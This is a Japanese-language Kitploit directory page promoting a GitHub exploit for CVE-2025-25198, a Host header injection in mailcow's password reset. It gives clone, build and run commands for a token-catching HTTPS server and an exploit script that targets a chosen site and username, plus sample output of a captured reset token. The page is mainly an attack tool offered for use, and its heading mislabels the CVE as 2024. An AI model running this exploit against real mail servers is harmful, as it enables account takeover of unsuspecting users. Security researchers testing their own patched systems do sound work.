Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/enzocipher/cve-2025-25198
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

パスワードリセットトークンをMailcowのHostヘッダーインジェクション攻撃から取得します。

リポジトリを見る
110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-25198

mailcow: dockerized は、Docker ベースのオープンソースのグループウェア/メールスイートです。バージョン 2025-01a より前のバージョンでは、mailcow のパスワードリセット機能に脆弱性があり、攻撃者が Host HTTP ヘッダーを操作して、攻撃者が制御するドメインを指すパスワードリセットリンクを生成できます。ユーザーがこの改ざんされたリンクをクリックすると、アカウント乗っ取りにつながる可能性があります。

仕組み

すべてのリクエストを待ち受ける HTTPS サーバーをセットアップし、選択した <IP> を Host ヘッダーに含む POST リクエストを Web サイトに送信します。Burpsuite を使用してリクエストを送信し、サーバーでトークンを取得することもできます。

特徴

  • パスワード変更トークンを取得する HTTPS サーバー
  • Web サイトの脆弱性を攻撃するエクスプロイトスクリプト
  • すべて修正済みで、動作に openssl は不要になりました

前提条件

  • Go 1.16 以上

サーバースクリプト

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

エクスプロイトスクリプト

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optional >

しばらく待つと、サーバーは使用できるトークンを出力します:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
ツールをダウンロード